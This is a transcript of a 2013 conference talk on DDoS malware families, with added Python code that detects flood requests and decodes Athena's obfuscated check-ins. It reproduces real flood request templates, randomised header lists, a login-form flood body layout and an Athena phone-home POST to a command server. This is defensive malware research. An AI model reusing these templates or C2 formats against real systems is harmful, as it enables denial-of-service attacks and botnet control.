Advancements in DDoS Malware
DESCRIPTION
This presentation explores advancements in DDoS malware, based on research from Arbor Networks' ASERT security analyst Jason Jones. It was originally shared at Usenix LEET '13.
TRANSCRIPT
Recent Advancements in DDoS Malware
Jason Jones
Usenix LEET '13
Agenda
• Who am I?
• Why?
• What Hasn’t Changed
• What Has Changed
  – Better Blending In & Hiding
  – Better Botnet Building
  – Better Protection
• Trends and Takeaways
Who am I?
• Jason Jones
  – Security Research Analyst on Arbor Networks’ ASERT
  – Presented at
    • BlackHat USA 2012
    • InfoSec Southwest 2013
  – Research interests
    • IP reputation
    • Malware clustering
    • Data mining
    • Graph Theory / Combinatorics
ASERT Malware Corral
• Arbor Security Engineering & Response Team
• ASERT Malware Corral
  – Malware storage + processing system
  – Processing occurs via sandbox, static methods
  – Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples / day
• 567 unique family names tagged last year
  – Includes DDoS, Bankers, Infostealers, APT, etc.
Why?
• DDoS Becoming More of a Threat
  – SpamHaus
  – “Triple Crown”
  – Political Motivations
  – Anon Ops
  – Ransom
• DDoS-specific Malware Evolving In Response to Our Response
What Hasn’t Changed
Still the same…
• Most Malware Include
  – Basic GET/POST Flood
  – SYN and/or Connection Flood
  – UDP Flood
• Lots of IRC CnC Still Around
• Many use hard-coded set of user-agents
• Still broken
  – Slowloris
  – ARME
Still the same… (cont.)
• .NET malware is still terrible
  – Most decompiles fine in .NET Reflector
  – Use .NET HTTP methods
  – Looks mostly the same for DDoS
• Gh0st RAT variants still popular
• Most are not fully protocol aware
• Many don’t do SSL / HTTPS
• Copy + Paste still prevalent
What Has Changed
Better Blending In & Hiding on the Network
• HTTP CnC has always been popular
  – Tended to be plaintext
  – Athena recently moved from IRC -> HTTP
    • Obfuscates commands
    • Example:
      – a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D
      – b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D
      – c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex
  – Betabot employs encryption on phone-home
• Adjustable phone-home intervals
  – Specify long intervals to avoid suspicion
Better Blending In & Hiding on the Network (cont.)
• More Intelligent HTTP Attacks
  – Requests look more legitimate now
    • Drive uses randomization in UA’s
    • Athena uses long list of legitimate UA’s
  – More dynamic headers
    • Paradise borrowed from Armageddon2
  – Ability to specify POST parameters
    • Target search boxes, login forms, etc.
    • Use up DB queries, server processing
    • Randomized per request, avoid caching
Example – DirtJumper Drive POST Attack
POST /test HTTP/1.1
Host: 192.168.56.1:10000
User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://192.168.56.1:10000/
Content-Length: 2443
Content-Type: application/x-www-form-urlencoded

login=…&.........

Body layout (bracketed numbers are the lengths of the random values):
login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
Example – BlackRev
GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie: PHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Athena IRC + HTTP
HTTP Attack (request template; "|" separates the alternatives the bot picks from)
GET|POST|HEAD /<params> HTTP/1.1
Host: <target>
Range: bytes=<range bytes string>
Connection: Keep-alive | close
User-Agent: ObtainUserAgentString()
Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public | private | max-stale
Vary: * | User-Agent
Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c | text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1
Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip
Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en
Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif
Content-Length: <length>
X-a: b
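The two request shapes above give a defender something concrete to key on, and the Drive slide even lets the body be reconstructed exactly: the bracketed value lengths plus the field names, "=" signs and "&" separators add up to its Content-Length of 2443. The following Python is an added example, not code from the deck or from ASERT: a small classifier that parses a raw HTTP request and tags it when it carries the complete Drive credential-field set, an oversized credential value, or the fixed "X-a: b" trailer from the Athena template. The sample requests (random filler for the Drive body, the hostnames, and the 500-byte threshold) are constructed for the example, not captured traffic.

```python
import random
import string

# Field spec copied from the Drive POST body on the slide:
# "login=[1000]" means a 1000-character random value.
DRIVE_FORM_SPEC = [
    ("login", 1000), ("pass", 1000), ("password", 50), ("log", 50),
    ("passwrd", 50), ("user", 50), ("username", 50),
    ("vb_login_username", 50), ("vb_login_md5password", 50),
]
DRIVE_FORM_FIELDS = {name for name, _ in DRIVE_FORM_SPEC}
# Assumed threshold for this example: no real login form submits a 500+ byte credential.
OVERSIZED_CREDENTIAL = 500


def drive_body_length(spec=DRIVE_FORM_SPEC):
    """Bytes of a urlencoded body built from spec: name, '=', value, plus '&' separators."""
    return sum(len(name) + 1 + length for name, length in spec) + (len(spec) - 1)


def build_constructed_drive_request(seed=1):
    """Constructed test fixture shaped like the slide's Drive POST (random filler, not captured traffic)."""
    rng = random.Random(seed)
    body = "&".join(
        name + "=" + "".join(rng.choices(string.ascii_lowercase + string.digits, k=length))
        for name, length in DRIVE_FORM_SPEC
    )
    head = "\r\n".join([
        "POST /test HTTP/1.1",
        "Host: 192.168.56.1:10000",
        "User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(body),
    ])
    return head + "\r\n\r\n" + body


# Constructed GET in the shape of the Athena template, ending in its fixed "X-a: b" header.
ATHENA_STYLE_GET = "\r\n".join([
    "GET /index.php HTTP/1.1",
    "Host: target.example",
    "Range: bytes=0-1",
    "Connection: Keep-alive",
    "User-Agent: Mozilla/5.0",
    "Cache-Control: no-cache",
    "X-a: b",
]) + "\r\n\r\n"

# Constructed benign login POST for contrast.
BENIGN_BODY = "username=alice&password=s3cret"
BENIGN_POST = "\r\n".join([
    "POST /login HTTP/1.1",
    "Host: shop.example",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: %d" % len(BENIGN_BODY),
]) + "\r\n\r\n" + BENIGN_BODY


def parse_http_request(raw):
    """Split a raw request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def form_field_lengths(body):
    """Map each urlencoded field name to the length of its (still encoded) value."""
    lengths = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            lengths[name] = len(value)
    return lengths


def classify(raw):
    """Return the heuristic tags that fire for one request (empty list = nothing suspicious)."""
    request_line, headers, body = parse_http_request(raw)
    tags = []
    if headers.get("x-a") == "b":
        tags.append("athena-template-header")
    if request_line.startswith("POST "):
        lengths = form_field_lengths(body)
        if set(lengths) == DRIVE_FORM_FIELDS:
            tags.append("drive-credential-form-flood")
        if any(n in DRIVE_FORM_FIELDS and l >= OVERSIZED_CREDENTIAL for n, l in lengths.items()):
            tags.append("oversized-credential-value")
        declared = headers.get("content-length")
        if declared is not None and int(declared) != len(body.encode()):
            tags.append("content-length-mismatch")
    return tags
```

The exact field-set match is brittle (a new Drive build only has to add a field), which is why the oversized-credential test sits beside it: the length of the random filler, not the field names, is what makes these POSTs expensive for the target, so it is the more durable signal to alert on.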
Example – Athena HTTP Phone Home
POST /gate.php HTTP/1.1
Host: panel-gc.co.uk:69
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727)
Content-Length: 436

a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b%63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b%61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c=%31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a%77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOmM3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8

• |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP|ver:v1.0.3|net:4.0|
• |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|
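The obfuscated a/b/c body on the earlier "Blending In" slide and the phone-home above use the same layout, and the "Obfuscates commands" bullet is all the deck says about it. The Python below is an added example, not code from the deck or from ASERT, that recovers the bot message from such a body so an analyst can see what a check-in reports. The layout it implements is inferred from the values on the slides rather than stated there, so treat it as an assumption: parameter a is percent-encoded base64 of two 26-letter alphabets joined by ":", parameter b is base64 of the "|"-delimited message in which every lowercase character has been replaced through that alphabet pair (uppercase, digits and "=" are untouched), and parameter c is not needed to recover the message. The sample body is the a/b/c triple from the earlier slide, copied verbatim.

```python
import base64
import string
from urllib.parse import unquote

# Sample body: the a, b and c parameters from the command-channel slide, copied verbatim.
ATHENA_BODY = (
    "a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73"
    "%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70"
    "%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D"
    "&b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRb"
    "gW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D"
    "&c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex"
)


def parse_body(body):
    """Split an x-www-form-urlencoded body and percent-decode each value."""
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params[name] = unquote(value)
    return params


def load_alphabets(a_value):
    """Parameter a: base64 of 'plain_alphabet:cipher_alphabet' (layout inferred from the slide data)."""
    key = base64.b64decode(a_value).decode("ascii")
    plain_alpha, cipher_alpha = key.split(":")
    for alpha in (plain_alpha, cipher_alpha):
        if sorted(alpha) != list(string.ascii_lowercase):
            raise ValueError("key half is not a permutation of a-z: %r" % alpha)
    return plain_alpha, cipher_alpha


def decode_message(b_value, plain_alpha, cipher_alpha):
    """Undo the lowercase-only substitution on b, then base64-decode the result."""
    # cipher_alpha[i] was written in place of plain_alpha[i]; map each one back.
    table = str.maketrans(cipher_alpha, plain_alpha)
    return base64.b64decode(b_value.translate(table)).decode("ascii")


def parse_fields(message):
    """'|type:on_exec|uid:...|' -> {'type': 'on_exec', 'uid': '...'}."""
    fields = {}
    for item in message.split("|"):
        if item:
            key, _, value = item.partition(":")
            fields[key] = value
    return fields


def decode_checkin(body):
    """Return (plaintext message, parsed fields) for one Athena HTTP request body."""
    params = parse_body(body)
    plain_alpha, cipher_alpha = load_alphabets(params["a"])
    message = decode_message(params["b"], plain_alpha, cipher_alpha)
    return message, parse_fields(message)


if __name__ == "__main__":
    text, fields = decode_checkin(ATHENA_BODY)
    print(text)
    for key, value in fields.items():
        print("%-6s %s" % (key, value))
```

Because the substitution key travels in the same request it protects, the scheme hides nothing from anyone holding the capture; its only effect is to defeat plaintext signatures on the body, which is why the constant header layout (Host, `gate.php`, `Connection: close`, fixed User-Agent) is a better thing to alert on than the body content.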
Example – Paradise
status=headers
application/xml, image/png, text/html
*/*, text/html, text/html, application/xml
text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c
x-gzip, identity
x-compress, x-zip, sdch
x-compress ,deflate, gzip, x-gzip
us-ua;q=0.5
az-us;q=0.9
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
http://www.snpp.com/
http://ask.fm/FlOoRNOoBlE
http://www.thesimpsons.com/
http://mylarha.deviantart.com/
http://www.thesimpsonslatino.com/
Building Better Botnets
• Use What’s Readily Available
  – “Triple Crown” financial attacks
    • Tiered CnC Structure
    • Dynamically update code with new attacks
    • Can easily adjust attacks if current attack is unsuccessful
  – SpamHaus DNS Amplification
    • Open resolvers
    • Not botnet per se, but…
    • Highly successful
Better Protections
• Store attacks in external DLL
  – Paradise: Pulled down by main EXE
  – DLL is crypted
• Restrict bots to geo regions
  – Also blackholing connections
• Drop other malware on the same machine
• Previously mentioned obfuscating / encrypting phone-home
• More malware using encryption internal to binary
• More packers / obfuscations used
Better Protections (cont.)
• More Junk Code
• New Drive variant discards old phone home
  – 2-stage phone home
  – Base64 + underlying protection
  – 3 new attacks
  – Can now specify hard-coded or random Cookie vals
  – Still reversing….
  – Blog soon?
Trends and Takeaways
Trends and Takeaways
• DDoS becoming more of a feature of larger families
  – Still plenty of standalone, but becoming more common in other malware
• DNS amplification will likely make its way into malware soon
  – Too successful not to
  – Too easy not to
• More booter services popping up
  – Many Athena HTTP CnC hostnames appear to be booter backends
• Carberp source code leak will likely create a boom in Carberp variants similar to ZeuS
More Trends and Takeaways…
• Traditional botnets with DDoS addons don’t DDoS much
  – DarkComet
  – Some Athena HTTP used to mostly drop other malware
    • Nitol, Betabot, Andromeda, ZeuS
    • Appear to be botnet-for-hire types
• Still waiting for the first SPDY-aware malware :)
• Proper mobile DDoS botnet soon?
Questions/Comments/Feedback
• [email protected]
• @jasonljones
Thanks: Arbor/ASERT, Marc Eisenbarth, Alex Bardas
Thank You!